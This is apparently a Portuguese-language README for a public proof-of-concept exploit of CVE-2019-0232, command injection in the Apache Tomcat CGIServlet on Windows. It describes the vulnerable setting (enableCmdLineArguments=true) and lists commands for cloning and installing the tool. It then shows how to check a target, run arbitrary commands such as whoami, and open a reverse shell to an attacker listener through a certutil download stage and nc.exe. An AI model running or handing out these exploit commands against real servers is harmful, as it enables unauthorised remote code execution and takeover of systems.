
CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Apache Tomcat CGIServlet enableCmdLineArguments RCE
Injeção de script em lote do Windows via argumentos de string de consulta
O Apache Tomcat com o servlet CGI habilitado e enableCmdLineArguments=true passa parâmetros de string de consulta como argumentos de linha de comando para scripts CGI. No Windows, arquivos de lote (.bat/.cmd) interpretam & como um separador de comandos, permitindo a execução arbitrária de comandos por meio de uma URL maliciosa.
conf/web.xml ou WEB-INF/web.xmlenableCmdLineArguments=true nos init-params do servlet CGIism.bat) implantado e acessível&)git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt
Verifique se o endpoint CGI existe:
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
Execute um comando:
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
Reverse shell (certutil em 2 estágios + nc.exe):
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444